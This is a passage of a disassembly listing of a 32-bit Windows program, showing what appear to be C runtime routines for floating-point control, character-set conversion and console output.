loc_40FCCB: ; CODE XREF: sub_40FB20+1A7�j
test esi, esi
pop edi
jz short loc_40FCD8
push 10h
call sub_410084
pop ecx
loc_40FCD8: ; CODE XREF: sub_40FB20+1AE�j
and [ebp+var_4], 0FFFFFFFDh
mov esi, [ebp+var_4]
loc_40FCDF: ; CODE XREF: sub_40FB20+29�j
; sub_40FB20+43�j ...
test byte ptr [ebp+arg_0], 10h
jz short loc_40FCF6
test byte ptr [ebp+arg_8], 20h
jz short loc_40FCF6
push 20h
call sub_410084
pop ecx
and esi, 0FFFFFFEFh
loc_40FCF6: ; CODE XREF: sub_40FB20+1C3�j
; sub_40FB20+1C9�j
xor eax, eax
test esi, esi
pop esi
setz al
pop ebx
leave
retn
sub_40FB20 endp
; =============== S U B R O U T I N E =======================================
sub_40FD01 proc near ; CODE XREF: sub_40FD56+6C�p
; sub_40FD56+91�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 1
jz short loc_40FD1D
jle short locret_40FD28
cmp eax, 3
jg short locret_40FD28
call sub_4057D3
mov dword ptr [eax], 22h
retn
; ---------------------------------------------------------------------------
loc_40FD1D: ; CODE XREF: sub_40FD01+7�j
call sub_4057D3
mov dword ptr [eax], 21h
locret_40FD28: ; CODE XREF: sub_40FD01+9�j
; sub_40FD01+E�j
retn
sub_40FD01 endp
; =============== S U B R O U T I N E =======================================
sub_40FD29 proc near ; CODE XREF: sub_40FE47+55�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
test al, 20h
jz short loc_40FD35
push 5
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD35: ; CODE XREF: sub_40FD29+6�j
test al, 8
jz short loc_40FD3D
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40FD3D: ; CODE XREF: sub_40FD29+E�j
test al, 4
jz short loc_40FD45
push 2
jmp short loc_40FD4B
; ---------------------------------------------------------------------------
loc_40FD45: ; CODE XREF: sub_40FD29+16�j
test al, 1
jz short loc_40FD4D
push 3
loc_40FD4B: ; CODE XREF: sub_40FD29+A�j
; sub_40FD29+1A�j
pop eax
retn
; ---------------------------------------------------------------------------
loc_40FD4D: ; CODE XREF: sub_40FD29+1E�j
movzx eax, al
and eax, 2
add eax, eax
retn
sub_40FD29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FD56(int,int,int,int,int,int,double,int)
sub_40FD56 proc near ; CODE XREF: sub_40FDF4+2A�p
; sub_40FE47+87�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = qword ptr 20h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 20h
xor eax, eax
loc_40FD5E: ; CODE XREF: sub_40FD56+18�j
mov ecx, dword_423FD0[eax*8]
cmp ecx, [ebp+arg_4]
jz short loc_40FDCE
inc eax
cmp eax, 1Dh
jl short loc_40FD5E
xor eax, eax
loc_40FD72: ; CODE XREF: sub_40FD56+7F�j
test eax, eax
mov [ebp+var_1C], eax
jz short loc_40FDD7
mov eax, [ebp+arg_8]
mov [ebp+var_18], eax
mov eax, [ebp+arg_C]
mov [ebp+var_14], eax
mov eax, [ebp+arg_10]
mov [ebp+var_10], eax
mov eax, [ebp+arg_14]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, dword ptr [ebp+arg_18]
mov dword ptr [ebp+var_8], eax
mov eax, dword ptr [ebp+arg_18+4]
push 0FFFFh
push [ebp+arg_20]
mov [ebp+var_20], esi
mov dword ptr [ebp+var_8+4], eax
call sub_41005D
lea eax, [ebp+var_20]
push eax
call sub_40F708
add esp, 0Ch
test eax, eax
jnz short loc_40FDC8
push esi
call sub_40FD01
pop ecx
loc_40FDC8: ; CODE XREF: sub_40FD56+69�j
fld [ebp+var_8]
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_40FDCE: ; CODE XREF: sub_40FD56+12�j
mov eax, off_423FD4[eax*8]
jmp short loc_40FD72
; ---------------------------------------------------------------------------
loc_40FDD7: ; CODE XREF: sub_40FD56+21�j
push 0FFFFh
push [ebp+arg_20]
call sub_41005D
push [ebp+arg_0]
call sub_40FD01
fld [ebp+arg_18]
add esp, 0Ch
leave
retn
sub_40FD56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FDF4(int,double,int)
sub_40FDF4 proc near ; CODE XREF: sub_40A6EF+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_423FC0, 0
jnz short loc_40FE28
push [ebp+arg_C] ; int
fld [ebp+arg_4]
sub esp, 18h
fstp [esp+1Ch+var_C]
fldz
fstp [esp+1Ch+var_14]
fld [ebp+arg_4]
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_40FD56
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FE28: ; CODE XREF: sub_40FDF4+A�j
call sub_4057D3
push 0FFFFh
push [ebp+arg_C]
mov dword ptr [eax], 21h
call sub_41005D
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_40FDF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FE47(int,int,double,double,int)
sub_40FE47 proc near ; CODE XREF: sub_40A6EF:loc_40A7B4�p
var_9C = qword ptr -9Ch
var_94 = qword ptr -94h
var_8C = qword ptr -8Ch
var_84 = dword ptr -84h
var_80 = byte ptr -80h
var_40 = dword ptr -40h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 80h
mov eax, dword_423064
xor eax, esp
mov [esp+80h+var_4], eax
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_40FB20
add esp, 0Ch
test eax, eax
jnz short loc_40FE99
and [esp+80h+var_40], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_18]
push [ebp+arg_0]
push eax
lea eax, [esp+98h+var_80]
push eax
call sub_40F846
add esp, 1Ch
loc_40FE99: ; CODE XREF: sub_40FE47+2B�j
push [ebp+arg_0]
call sub_40FD29
add esp, 4
cmp dword_423FC0, 0
jnz short loc_40FED8
test eax, eax
jz short loc_40FED8
push [ebp+arg_18] ; int
fld [ebp+arg_10]
sub esp, 18h
fstp [esp+9Ch+var_8C]
fldz
fstp [esp+9Ch+var_94]
fld [ebp+arg_8]
fstp [esp+9Ch+var_9C]
push [ebp+arg_4] ; int
push eax ; int
call sub_40FD56
add esp, 24h
jmp short loc_40FEF2
; ---------------------------------------------------------------------------
loc_40FED8: ; CODE XREF: sub_40FE47+64�j
; sub_40FE47+68�j
push eax
call sub_40FD01
mov [esp+84h+var_84], 0FFFFh
push [ebp+arg_18]
call sub_41005D
fld [ebp+arg_10]
pop ecx
pop ecx
loc_40FEF2: ; CODE XREF: sub_40FE47+8F�j
mov ecx, [esp+80h+var_4]
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
sub_40FE47 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40FF01(double)
sub_40FF01 proc near ; CODE XREF: sub_40A6EF:loc_40A775�p
var_8 = qword ptr -8
arg_0 = qword ptr 4
push ecx
push ecx
fld [esp+8+arg_0]
frndint
fstp [esp+8+var_8]
fld [esp+8+var_8]
pop ecx
pop ecx
retn
sub_40FF01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF12(double,int)
sub_40FF12 proc near ; CODE XREF: sub_40FF97+79�p
; sub_40FF97+8E�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
fld [ebp+arg_0]
mov ecx, dword ptr [ebp+arg_0+6]
fstp [ebp+var_8]
add eax, 3FEh
shl eax, 4
and ecx, 0FFFF800Fh
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_40FF12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF3C proc near ; CODE XREF: sub_40A6EF+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_40FF54
cmp [ebp+arg_0], edx
jnz short loc_40FF67
xor eax, eax
inc eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF54: ; CODE XREF: sub_40FF3C+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_40FF67
cmp [ebp+arg_0], edx
jnz short loc_40FF67
push 2
loc_40FF64: ; CODE XREF: sub_40FF3C+3C�j
; sub_40FF3C+55�j
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF67: ; CODE XREF: sub_40FF3C+11�j
; sub_40FF3C+1F�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_40FF7A
push 3
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF7A: ; CODE XREF: sub_40FF3C+38�j
cmp cx, 7FF0h
jnz short loc_40FF93
test [ebp+arg_4], 7FFFFh
jnz short loc_40FF8F
cmp [ebp+arg_0], edx
jz short loc_40FF93
loc_40FF8F: ; CODE XREF: sub_40FF3C+4C�j
push 4
jmp short loc_40FF64
; ---------------------------------------------------------------------------
loc_40FF93: ; CODE XREF: sub_40FF3C+43�j
; sub_40FF3C+51�j
xor eax, eax
pop ebp
retn
sub_40FF3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40FF97(double,int)
sub_40FF97 proc near ; CODE XREF: sub_40FB20+122�p
var_C = qword ptr -0Ch
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
fldz
fcom [ebp+arg_0]
fnstsw ax
test ah, 44h
jp short loc_40FFAD
xor edx, edx
jmp loc_41003F
; ---------------------------------------------------------------------------
loc_40FFAD: ; CODE XREF: sub_40FF97+D�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41001A
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_40FFC5
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41001A
loc_40FFC5: ; CODE XREF: sub_40FF97+27�j
fcomp [ebp+arg_0]
mov edx, 0FFFFFC03h
fnstsw ax
test ah, 41h
jnz short loc_40FFD9
xor eax, eax
inc eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFD9: ; CODE XREF: sub_40FF97+3B�j
xor eax, eax
jmp short loc_40FFF1
; ---------------------------------------------------------------------------
loc_40FFDD: ; CODE XREF: sub_40FF97+5E�j
shl dword ptr [ebp+arg_0+4], 1
test dword ptr [ebp+arg_0], 80000000h
jz short loc_40FFED
or dword ptr [ebp+arg_0+4], 1
loc_40FFED: ; CODE XREF: sub_40FF97+50�j
shl dword ptr [ebp+arg_0], 1
dec edx
loc_40FFF1: ; CODE XREF: sub_40FF97+40�j
; sub_40FF97+44�j
test byte ptr [ebp+arg_0+6], 10h
jz short loc_40FFDD
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_410007
or word ptr [ebp+arg_0+6], 8000h
loc_410007: ; CODE XREF: sub_40FF97+68�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
add esp, 0Ch
jmp short loc_41003F
; ---------------------------------------------------------------------------
loc_41001A: ; CODE XREF: sub_40FF97+1E�j
; sub_40FF97+2C�j
push ecx ; int
fstp st
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
call sub_40FF12
mov edx, dword ptr [ebp+arg_0+6]
shr edx, 4
and edx, 7FFh
add esp, 0Ch
sub edx, 3FEh
loc_41003F: ; CODE XREF: sub_40FF97+11�j
; sub_40FF97+81�j
mov eax, [ebp+arg_8]
mov [eax], edx
pop ebp
retn
sub_40FF97 endp
; =============== S U B R O U T I N E =======================================
sub_410046 proc near ; CODE XREF: sub_40F846+DC�p
var_4 = word ptr -4
push ecx
fstsw [esp+4+var_4]
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410046 endp
; =============== S U B R O U T I N E =======================================
sub_410051 proc near ; CODE XREF: sub_40F846:loc_40FA59�p
var_4 = word ptr -4
push ecx
fnstsw [esp+4+var_4]
fnclex
movsx eax, [esp+4+var_4]
pop ecx
retn
sub_410051 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41005D proc near ; CODE XREF: sub_40A6EF+13�p
; sub_40A6EF+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
and ecx, [ebp+arg_4]
not eax
and eax, [ebp+var_4]
or eax, ecx
movzx eax, ax
mov [ebp+arg_4], eax
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41005D endp
; =============== S U B R O U T I N E =======================================
sub_410084 proc near ; CODE XREF: sub_40FB20+20�p
; sub_40FB20+3A�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 4
push ecx
push ecx
mov cl, byte ptr [esp+8+arg_0]
test cl, 1
jz short loc_41009A
fld tbyte_4240E0
fistp [esp+8+arg_0]
wait
loc_41009A: ; CODE XREF: sub_410084+9�j
test cl, 8
jz short loc_4100AF
fstsw ax
fld tbyte_4240E0
fstp [esp+8+var_8]
wait
fstsw ax
loc_4100AF: ; CODE XREF: sub_410084+19�j
test cl, 10h
jz short loc_4100BE
fld tbyte_4240EC
fstp [esp+8+var_8]
wait
loc_4100BE: ; CODE XREF: sub_410084+2E�j
test cl, 4
jz short loc_4100CC
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_4100CC: ; CODE XREF: sub_410084+3D�j
test cl, 20h
jz short loc_4100D7
fldpi
fstp [esp+8+var_8]
wait
loc_4100D7: ; CODE XREF: sub_410084+4B�j
pop ecx
pop ecx
retn
sub_410084 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4100DA proc near ; CODE XREF: sub_4134A7+243�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_421908
call __SEH_prolog4
xor eax, eax
cmp dword_433C7C, eax
jz short loc_410146
test byte ptr [ebp+arg_0], 40h
jz short loc_41013E
cmp dword_4240F8, eax
jz short loc_41013E
mov [ebp+ms_exc.disabled], eax
ldmxcsr [ebp+arg_0]
jmp short loc_410135
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
cmp eax, 0C0000005h
jz short loc_41011F
cmp eax, 0C000001Dh
jz short loc_41011F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41011F: ; CODE XREF: sub_4100DA+39�j
; sub_4100DA+40�j
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
and dword_4240F8, 0
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410135: ; CODE XREF: sub_4100DA+2B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
jmp short loc_410146
; ---------------------------------------------------------------------------
loc_41013E: ; CODE XREF: sub_4100DA+1A�j
; sub_4100DA+22�j
and [ebp+arg_0], 0FFFFFFBFh
ldmxcsr [ebp+arg_0]
loc_410146: ; CODE XREF: sub_4100DA+14�j
; sub_4100DA+62�j
call __SEH_epilog4
retn
sub_4100DA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41014C proc near ; CODE XREF: sub_41019D+A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_40271F
movzx eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov dl, [ebp+arg_C]
test [ecx+eax+1Dh], dl
jnz short loc_41018B
cmp [ebp+arg_8], 0
jz short loc_410185
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, [ebp+arg_8]
jmp short loc_410187
; ---------------------------------------------------------------------------
loc_410185: ; CODE XREF: sub_41014C+25�j
xor eax, eax
loc_410187: ; CODE XREF: sub_41014C+37�j
test eax, eax
jz short loc_41018E
loc_41018B: ; CODE XREF: sub_41014C+1F�j
xor eax, eax
inc eax
loc_41018E: ; CODE XREF: sub_41014C+3D�j
cmp [ebp+var_4], 0
jz short locret_41019B
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_41019B: ; CODE XREF: sub_41014C+46�j
leave
retn
sub_41014C endp
; =============== S U B R O U T I N E =======================================
sub_41019D proc near ; CODE XREF: sub_40AB84+3F�p
; sub_40ACBC+53�p ...
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
push 0
call sub_41014C
add esp, 10h
retn
sub_41019D endp
; =============== S U B R O U T I N E =======================================
sub_4101B0 proc near ; CODE XREF: sub_40B11E+56�p
; sub_40B699+59�p ...
arg_0 = dword ptr 4
xor eax, eax
inc eax
cmp [esp+arg_0], 0
jnz short locret_4101BC
xor eax, eax
locret_4101BC: ; CODE XREF: sub_4101B0+8�j
retn
sub_4101B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_4101BD proc near ; CODE XREF: sub_40BE59:loc_40BE87�p
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
test byte_4240FC, 1
push esi
jz short loc_4101EA
push 0Ah
call sub_409AB4
pop ecx
loc_4101EA: ; CODE XREF: sub_4101BD+23�j
call sub_40DD1C
test eax, eax
jz short loc_4101FB
push 16h
call sub_40DD29
pop ecx
loc_4101FB: ; CODE XREF: sub_4101BD+34�j
test byte_4240FC, 2
jz loc_4102A8
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
add esp, 0Ch
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
push 0
mov [ebp+2A8h+var_328], 40000015h
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call ds:dword_41D19C ; SetUnhandledExceptionFilter
lea eax, [ebp+2A8h+var_2D8]
push eax
call ds:dword_41D198 ; UnhandledExceptionFilter
loc_4102A8: ; CODE XREF: sub_4101BD+45�j
push 3
call sub_407AEA
int 3 ; Trap to Debugger
sub_4101BD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102B0 proc near ; CODE XREF: sub_40BF57+25A�p
; sub_40C33C+150�p
var_C = byte ptr -0Ch
var_6 = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push 6
lea eax, [ebp+var_C]
push eax
push 1004h
push [ebp+arg_0]
mov [ebp+var_6], 0
call ds:dword_41D054 ; GetLocaleInfoA
test eax, eax
jnz short loc_4102E1
or eax, 0FFFFFFFFh
jmp short loc_4102EB
; ---------------------------------------------------------------------------
loc_4102E1: ; CODE XREF: sub_4102B0+2A�j
lea eax, [ebp+var_C]
push eax
call sub_403EBD
pop ecx
loc_4102EB: ; CODE XREF: sub_4102B0+2F�j
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102F7 proc near ; CODE XREF: sub_40BF57+285�p
; sub_40BF57+336�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
mov [ebp+var_28], eax
mov eax, [ebp+arg_C]
push ebx
mov [ebp+var_30], eax
mov eax, [eax]
push esi
mov [ebp+var_24], eax
mov eax, [ebp+arg_0]
push edi
xor edi, edi
cmp eax, [ebp+arg_4]
mov [ebp+var_34], ecx
mov [ebp+var_20], edi
mov [ebp+var_2C], edi
jz loc_410494
mov esi, ds:dword_41D1B4
lea ecx, [ebp+var_18]
push ecx
push eax
call esi ; GetCPInfo
test eax, eax
mov ebx, ds:dword_41D0A0
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call esi ; GetCPInfo
test eax, eax
jz short loc_4103AA
cmp [ebp+var_18], 1
jnz short loc_4103AA
mov esi, [ebp+var_24]
cmp esi, 0FFFFFFFFh
mov [ebp+var_2C], 1
jnz short loc_410380
push [ebp+var_28]
call sub_404130
mov esi, eax
pop ecx
inc esi
loc_410380: ; CODE XREF: sub_4102F7+7B�j
cmp esi, edi
loc_410382: ; CODE XREF: sub_4102F7+C6�j
jle short loc_4103DF
cmp esi, 7FFFFFF0h
ja short loc_4103DF
lea eax, [esi+esi+8]
cmp eax, 400h
ja short loc_4103C6
call sub_4104B0
mov eax, esp
cmp eax, edi
jz short loc_4103DA
mov dword ptr [eax], 0CCCCh
jmp short loc_4103D7
; ---------------------------------------------------------------------------
loc_4103AA: ; CODE XREF: sub_4102F7+53�j
; sub_4102F7+59�j ...
push edi
push edi
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; MultiByteToWideChar
mov esi, eax
cmp esi, edi
jnz short loc_410382
loc_4103BF: ; CODE XREF: sub_4102F7+EE�j
xor eax, eax
jmp loc_410497
; ---------------------------------------------------------------------------
loc_4103C6: ; CODE XREF: sub_4102F7+9E�j
push eax
call sub_4036E0
cmp eax, edi
pop ecx
jz short loc_4103DA
mov dword ptr [eax], 0DDDDh
loc_4103D7: ; CODE XREF: sub_4102F7+B1�j
add eax, 8
loc_4103DA: ; CODE XREF: sub_4102F7+A9�j
; sub_4102F7+D8�j
mov [ebp+var_1C], eax
jmp short loc_4103E2
; ---------------------------------------------------------------------------
loc_4103DF: ; CODE XREF: sub_4102F7:loc_410382�j
; sub_4102F7+93�j
mov [ebp+var_1C], edi
loc_4103E2: ; CODE XREF: sub_4102F7+E6�j
cmp [ebp+var_1C], edi
jz short loc_4103BF
lea eax, [esi+esi]
push eax
push edi
push [ebp+var_1C]
call sub_407B70
add esp, 0Ch
push esi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_28]
push 1
push [ebp+arg_0]
call ebx ; MultiByteToWideChar
test eax, eax
jz short loc_41048B
mov ebx, [ebp+var_34]
cmp ebx, edi
jz short loc_410430
push edi
push edi
push [ebp+arg_14]
push ebx
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ds:dword_41D138 ; WideCharToMultiByte
test eax, eax
jz short loc_41048B
mov [ebp+var_20], ebx
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410430: ; CODE XREF: sub_4102F7+11A�j
cmp [ebp+var_2C], edi
mov ebx, ds:dword_41D138
jnz short loc_41044F
push edi
push edi
push edi
push edi
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_41048B
loc_41044F: ; CODE XREF: sub_4102F7+142�j
push esi
push 1
call sub_40777A
cmp eax, edi
pop ecx
pop ecx
mov [ebp+var_20], eax
jz short loc_41048B
push edi
push edi
push esi
push eax
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; WideCharToMultiByte
cmp eax, edi
jnz short loc_410480
push [ebp+var_20]
call sub_403603
pop ecx
mov [ebp+var_20], edi
jmp short loc_41048B
; ---------------------------------------------------------------------------
loc_410480: ; CODE XREF: sub_4102F7+179�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_41048B
mov ecx, [ebp+var_30]
mov [ecx], eax
loc_41048B: ; CODE XREF: sub_4102F7+113�j
; sub_4102F7+132�j ...
push [ebp+var_1C]
call sub_40BF3C
pop ecx
loc_410494: ; CODE XREF: sub_4102F7+38�j
mov eax, [ebp+var_20]
loc_410497: ; CODE XREF: sub_4102F7+CA�j
lea esp, [ebp-40h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402710
leave
retn
sub_4102F7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4104B0 proc near ; CODE XREF: sub_40BF57+F3�p
; sub_40BF57+1B1�p ...
arg_0 = byte ptr 4
push ecx
lea ecx, [esp+4+arg_0]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
sub_4104B0 endp
; ---------------------------------------------------------------------------
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp sub_411400
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104DC proc near ; CODE XREF: sub_40CE5A+2A1�p
; sub_40CE5A+2C1�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
xor esi, esi
cmp dword_424218, esi
jz short loc_410545
cmp dword_424224, 0FFFFFFFEh
jnz short loc_410505
call sub_41142B
loc_410505: ; CODE XREF: sub_4104DC+22�j
mov eax, dword_424224
cmp eax, 0FFFFFFFFh
jnz short loc_410515
loc_41050F: ; CODE XREF: sub_4104DC+56�j
; sub_4104DC+61�j ...
or ax, 0FFFFh
jmp short loc_410585
; ---------------------------------------------------------------------------
loc_410515: ; CODE XREF: sub_4104DC+31�j
push esi
lea ecx, [ebp+var_10]
push ecx
push 1
lea ecx, [ebp+arg_0]
push ecx
push eax
call ds:dword_41D0AC ; WriteConsoleW
test eax, eax
jnz short loc_410592
cmp dword_424218, 2
jnz short loc_41050F
call ds:dword_41D0F0 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_41050F
mov dword_424218, esi
loc_410545: ; CODE XREF: sub_4104DC+19�j
push esi
push esi
push 5
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push esi
call ds:dword_41D0B0 ; GetConsoleOutputCP
push eax
call ds:dword_41D138 ; WideCharToMultiByte
mov ecx, dword_424224
cmp ecx, 0FFFFFFFFh
jz short loc_41050F
push esi
lea edx, [ebp+var_10]
push edx
push eax
lea eax, [ebp+var_C]
push eax
push ecx
call ds:dword_41D0B4 ; WriteConsoleA
test eax, eax
jz short loc_41050F
loc_410581: ; CODE XREF: sub_4104DC+C0�j
